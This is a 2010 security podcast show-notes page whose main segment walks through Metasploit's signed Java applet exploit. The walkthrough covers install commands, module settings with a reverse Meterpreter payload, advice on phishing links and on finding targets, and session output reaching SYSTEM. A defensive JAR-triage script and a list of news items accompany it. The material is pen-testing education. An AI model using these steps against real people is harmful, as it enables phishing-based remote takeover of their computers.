Episode185

From Paul's Security Weekly
Revision as of 14:35, 29 January 2010 by Darkoperator (Talk | contribs)


SANS Las Vegas from October 26-27th will debut a new course titled "Embedded Device Security Assessments for the Rest of Us" which will teach students how to assess embedded systems of all varieties on pen tests and in your duties as a security professional.


Sponsors

  • Tenable Network Security - This episode sponsored by Tenable Network Security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the world's best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the world's best penetration testing tool.
  • Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!

Shameless Plugs & General Announcements

PaulDotCom Security Weekly - Episode 185 - For Thursday January 28th, 2010

  • Shmoocon - This will be the next big conference that we will all be attending. We will have t-shirts and other special things to give away and sell. No, we are not selling the interns (who will both be there, btw). So come find us at the booth for all things PaulDotCom including free stickers, and PaulDotCom complete works DVDs!

Guest Interview: David Maman, CTO of GreenSQL

INFO

David Maman is a self-described Entrepreneur and Technology Junkie who has founded a number of high-tech start-up companies, including GreenSQL, GreenCloud, Vanadium-Soft, TrioGreen, Preacos, and Moksai. David was a senior technologist for Fortinet and also the chief scientist at Ofek.


GreenSQL is an Open Source database firewall used to protect databases from SQL injection attacks. GreenSQL works as a proxy and has built-in support for MySQL. The logic is based on evaluating SQL commands using a risk scoring matrix as well as blocking known database administrative commands (DROP, CREATE, etc.). GreenSQL provides a MySQL database security solution. GreenSQL is distributed under the GPL license.

Questions

  1. How did you get your start in information security?

Metasploit Java Signed Applet Exploit

Yesterday Nathan Keltner from the Metasploit project committed new Java mixin code for performing attacks. Included in the code is the first module to use the mixin: the Java signed applet creator. This module creates a signed Java jar with the parameters and payload of our choosing and creates a listening server to serve as our attack host. To use this module, the Ruby gem rjb and the Sun Java JDK must be installed and configured on the box. Let me show you how to do it on BackTrack 4. First we must install the Java JDK; for this we run the following command:

apt-get install sun-java6-jdk

Once it is installed, we configure the JAVA_HOME environment variable and make sure that it is present for all bash users on the system, so that if we need to run Metasploit as root the variable will be set when we run the module.

echo "JAVA_HOME=/usr/lib/jvm/java-6-sun" >> /etc/bash.bashrc
echo "export JAVA_HOME" >> /etc/bash.bashrc
JAVA_HOME=/usr/lib/jvm/java-6-sun
export JAVA_HOME

Now that we have the environment variable all set we proceed to install the rjb gem by issuing the following command:

gem install rjb

Next we make sure we have the latest development version of the framework by moving to the framework folder and updating through svn:

cd /pentest/exploits/framework3
svn up

Now we launch msfconsole and proceed to configure the module for our attack:

./msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 495 exploits - 234 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
       =[ svn r8284 updated today (2010.01.28)

msf > use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet) > info

       Name: Signed Applet Social Engineering Code Exec
    Version: 8281
   Platform: Windows, OSX, Linux, Solaris
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  natron <natron@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Generic (Java Payload)
  1   Windows x86 (Native Payload)
  2   Mac OS X PPC (Native Payload)
  3   Mac OS X x86 (Native Payload)
  4   Linux x86 (Native Payload)

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  APPLETNAME   SiteLoader       yes       The main applet's class name.
  CERTCN       Metasploit Inc.  yes       The CN= value for the certificate.
  PAYLOADNAME  SiteSupport      yes       The payload classes name.
  SRVHOST      0.0.0.0          yes       The local host to listen on.
  SRVPORT      8080             yes       The local port to listen on.
  SSL          false            no        Negotiate SSL for incoming connections
  SSLVersion   SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                       no        The URI to use for this exploit (default is random)

Payload information:
  Space: 0
  Avoid: 0 characters

Description:
  This exploit dynamically creates an applet via the
  Msf::Exploit::Java mixin, converts it to a .jar file, then signs the
  .jar with a dynamically created certificate containing values of
  your choosing. This is presented to the end user via a web page with
  an applet tag, loading the signed applet. The user's JVM pops a
  dialog asking if they trust the signed applet and displays the
  values chosen. Once the user clicks 'accept', the applet executes
  with full user permissions. The java payload used in this exploit is
  derived from Stephen Fewer's and HDM's payload created for the
  CVE-2008-5353 java deserialization exploit. This module requires the
  rjb rubygem, the JDK, and the $JAVA_HOME variable to be set. If
  these dependencies are not present, the exploit falls back to a
  static, signed JAR.

References:
  http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf

msf exploit(java_signed_applet) >

Now that we have the module loaded we set the target for a Windows System:

msf exploit(java_signed_applet) > set TARGET 1
TARGET => 1

Now we set up the payload and configure its options:

msf exploit(java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(java_signed_applet) > set LHOST 192.168.1.100
LHOST => 192.168.1.100

By default the module creates a random URI path. I recommend changing the name depending on the type of phishing attack being performed:

msf exploit(java_signed_applet) > set URIPATH java
URIPATH => java
msf exploit(java_signed_applet) > set SRVPORT 80
SRVPORT => 80

Now we launch the exploit and send the link to our target. I recommend using a shortening service:

msf exploit(java_signed_applet) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on port 4444
[*] Using URL: http://0.0.0.0:80/java
[*]  Local IP: http://192.168.1.210:80/java
[*] Server started.

When a target connects to the server, we will see the module create the jar file, sign it, and send it to the target computer:

[*] Handling request from 192.168.1.208:1247...
[*] Generated executable to drop (37888 bytes).
[*] Compiling applet classes...
[*] Compile completed.  Building jar file...
Adding SiteLoader.class
Adding SiteLoader$SiteSupport.class
Adding SiteLoader$SiteSupport$StreamConnector.class
Adding completed OK
[*] Jar built.  Signing...

Warning:
The signer certificate will expire within six months.
[*] Jar signed.  Ready to send.
[*] Sending SiteLoader.jar to 192.168.1.208:1248...
[*] Sending SiteLoader.jar to 192.168.1.208:1248...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.1.210:4444 -> 192.168.1.208:1249)
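
For defenders triaging a JAR recovered from a proxy cache or a user's Java cache, the build log above gives a recognisable layout: a signed archive whose classes nest as Outer, Outer$Inner, Outer$Inner$StreamConnector. The following is an added example, not part of the original show notes or of Metasploit; the sample archives are constructed placeholders and the five-class threshold is an assumption.

```python
import io
import re
import zipfile

# Default names from the module options on this page (APPLETNAME, PAYLOADNAME).
# Both are configurable, so a literal match is only a weak signal.
DEFAULT_NAMES = {"SiteLoader", "SiteSupport"}
SIG_FILE = re.compile(r"^META-INF/[^/]+\.SF$", re.I)
SIG_BLOCK = re.compile(r"^META-INF/[^/]+\.(RSA|DSA|EC)$", re.I)
MAX_CLASSES = 5  # assumption: the log above shows a three-class archive


def triage_jar(data: bytes) -> dict:
    """Return structural findings for one JAR given as raw bytes."""
    with zipfile.ZipFile(io.BytesIO(data)) as jar:
        names = jar.namelist()
    classes = {n[:-len(".class")] for n in names if n.endswith(".class")}
    signed = (any(SIG_FILE.match(n) for n in names)
              and any(SIG_BLOCK.match(n) for n in names))
    # Layout from the build log: Outer, Outer$Inner, Outer$Inner$StreamConnector
    nested = any(
        c.count("$") == 2 and c.endswith("$StreamConnector")
        and c.rsplit("$", 1)[0] in classes and c.split("$", 1)[0] in classes
        for c in classes
    )
    simple = {part for c in classes for part in c.rsplit("/", 1)[-1].split("$")}
    return {
        "signed": signed,
        "class_count": len(classes),
        "stream_connector_nesting": nested,
        "default_names": sorted(simple & DEFAULT_NAMES),
        "suspicious": signed and nested and len(classes) <= MAX_CLASSES,
    }


def build_sample(entries) -> bytes:
    """Build a constructed JAR in memory; every entry is an empty placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        for name in entries:
            jar.writestr(name, b"")
    return buf.getvalue()


# Constructed samples (entry names only, no real class or signature data).
SAMPLE_FLAGGED = build_sample([
    "META-INF/MANIFEST.MF", "META-INF/SIGNER.SF", "META-INF/SIGNER.RSA",
    "SiteLoader.class", "SiteLoader$SiteSupport.class",
    "SiteLoader$SiteSupport$StreamConnector.class",
])
SAMPLE_BENIGN = build_sample([
    "META-INF/MANIFEST.MF", "com/example/App.class", "com/example/App$Helper.class",
])

if __name__ == "__main__":
    for label, blob in (("flagged", SAMPLE_FLAGGED), ("benign", SAMPLE_BENIGN)):
        print(label, triage_jar(blob))
```

The presence of `META-INF/*.SF` and a signature block only shows that the archive is signed; who signed it still has to be read from the certificate, for example with `jarsigner -verify -verbose -certs`.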

Now that we have a session, we can interact with it:

msf exploit(java_signed_applet) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run migrate
[*] Current server process: 0.6658820547377166.exe (2936)
[*] Migrating to lsass.exe...
[*] Migrating into process ID 672
[*] New server process: lsass.exe (672)
meterpreter > sysinfo
Computer: WINXP-SP2-VM
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > getuis
[-] Unknown command: getuis.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit

I do recommend doing some homework beforehand, since the target machine must have the JRE installed and configured for its browser. When enumerating a target network and company, things to look for are Oracle Application Servers, Tomcat servers and other Java application servers, since the likelihood of the JRE being installed on client machines is higher. Also, if we are able to intercept client traffic through wireless or a public network and we see Java trying to make an update, that is another good indication that it might be configured with the browser.

Stories For Discussion

  1. China pwns Oil Industry - [Mick] - This is an amazing long form article that covers energy markets, espionage, and future trends. I wish all reporting were this good!
  2. Not China? - [Mick] - Now it looks like the Aurora attack might not be China after all? Sigh... we need a better way to trace the source of attack!
  3. Digital DNA? - [Mick] - The forensics geek in me wants this to be true... but somehow I think this is a LONG way off. Keep working on this though DARPA boffins! This would be great to have.
  4. Attacking friends to get to targets - [Mick] - Oh hell yeah! Put the Social into your attack and get ready for all kinds of win. BTW: Bob approves of this very much.
  5. Jailed ID Thief commits ID theft while in Prison - [Mick] - I think this might be fail of the month here folks. If you go to jail for doing something bad, typically it means you are too dumb and got caught. So to keep doing the same thing... well that's a special kind of stupid.
  6. Say hello to Elenore! - [Mick] - Here's a great intro to browser exploit packs. Check it out! You'll be glad you did.
  7. No IP? No JavaScript? No cookie? No problem! - [Mick] - Wow I find this really neat! I like the idea from a forensics standpoint. Consider helping out by joining or just donating to the EFF.
  8. .EDU getting owned for SEO - [Larry] - While certainly not new, there appears to be a rise in the activity. Paul, I'd love to hear your comments about the open nature of the .EDU market and getting owned.
  9. Detailed recon - [Larry] - It is appearing that the attacks against Google (and maybe others) involved some very detailed recon against several targets. This is the thing that I've been mentioning for some time. Use all available methods for determining information about an organization, because, well, the attackers are doing it too. It becomes even more relevant when the attackers have all of the time in the world for a long con.
  10. Mmmm, ZigBee - [Larry] - So, Travis Goodspeed finds some issues in PRNG with the TI Z-Stack. He submits the bug report, and TI fixes it in an update in firmware. Of course, who updates their firmware? What scares me most is a quote from Travis: "Electric utilities with equipment using the MSP430 or Chipcon CC2530 should contact their vendors for such updates. Unlike Windows and Linux, there's no easy way to perform an upgrade of a fragment of micro-controller firmware to which you haven't got the source." Ouch.
  11. Aircraft passenger networks - [Larry] - Now that this is moving further down the slide to inevitability, the FAA admits that it does not have regulations on how to deal with passenger computer networks. One person associated with the design claims that there is "some crossover". Now, connect that passenger network to the internets, and in my opinion a firewall doesn't cut it.
  12. Awesome Usage of TOR - [PaulDotCom] - Our good friends over at www.i-hacked.com noticed that if they investigated an attack against them, the attackers would change IP addresses. Who'd thunk that the attackers would be checking their logs! Goes along with my theory that most attackers are better at IT and IT security than some of us good guys. The site then walks you through setting up your own Tor proxy for everyone to use, to evade detection by the bad guys. N-I-C-E, high five to i-hacked!
  13. Stories From The Trenches - [PaulDotCom] - I love these, they are raw and unfiltered. Stories that you hear when you are out drinking at a security conference. Stories rule. I wish more people would share stories rather than the useless dribble that fills much of the "blogesphere" every week in information security (If I see one more post of "oh, this new version of the tool was released" without any further information, please shoot me). In any case, story #1 goes like this, man uses laptop, man lets girlfriend use laptop, laptop no worky, turns out girlfriend works for competition. Ouch. Story #2 is a life tip, when referring to a "reach around" do not hit "Reply-To All" and CC your entire company. You will have some explaining to do. On the plus side, you might make new friends.
  14. Passwords Suck - But Wireless Is Better? - [PaulDotCom] - This article does a great job of concisely explaining why passwords, and how we currently deal with them, suck. He offers a vendor solution that requires a USB dongle to be attached to the computer, and an RF transmitter attached to the person who needs to authenticate. No typing required. Reminds me of Star Trek, are they on to something with solving our password problems? It's much harder to attack remotely if the user account truly has no other means of authenticating other than the token. But how secure is the token system?
  15. Hacker Puts Porn On Billboard - [PaulDotCom] - I just think this is great and is my top story of the week. Imagine driving down the highway and see porn on the billboard! It caused some traffic jams! Denial of service attack? Didn't look like there was any denying of service going on in the movie :)
  16. XSS, SQL Injection, and Fuzzing Bar Codes - [PaulDotCom] - Ask and you shall receive. Irongeek has put together some sample barcodes that can be scanned and will send attack strings. I <3 Irongeek.
  17. Is the lack of iPad Flash support for security? - [PaulDotCom] - NOT! First, if it would make Apple more money they would put flash on it even if it had 12,345 0day exploits (Apple fan boys don't care about security, remember, they run Macs, no viruses). Second, Apple's products most likely have more holes than Adobe Flash, but we don't hear about them because if you want to build a botnet to profit you target Windows, where everyone has flash because dogs that sing are entertaining. Third, Apple has quicktime, so who needs Flash? Fourth, Flash sucks processor and battery life. Fifth, Who cares anyway? The only sites that use Flash are youtube (which has an app) and every restaurant and MySpace page on the planet. At some point we have to question WHY we are allowing these technologies to be used, rather than just letting our users do whatever the hell they want. Okay, I'm on a different rant now. In any case, I also have to say that writing an application in Flash, like Nessus, is totally cool and we should not continue to knock technology because it has bugs, because all technology has bugs. That being said, I run Flashblocker so how's that for a mind bender! (yes, I allow my Nessus servers to load Flash applications, and yes once the API is released we will have a Nessus flash iphone/ipad application).

Other Stories Of Interest

  • Job opening down South - [Mick] - No, further south than that... Need a hint? I hear you like penguins.  ;-)
  • "Perfect SPAM protection" - [Mick] - Look, I want this to be true, but I just know it's only a matter of time before someone comes up with a better way to pitch genuine replica watches.
  • Battling Cybercrime interview on NPR - [Mick] - I *loved* this interview, it's the most gentle and clear way I've ever heard anyone talk about botnets. My parents heard this interview and had an "Oh this is what Mick does as a job" moment. For nothing else, listen just to learn how to explain deep geek to folks who barely use computers.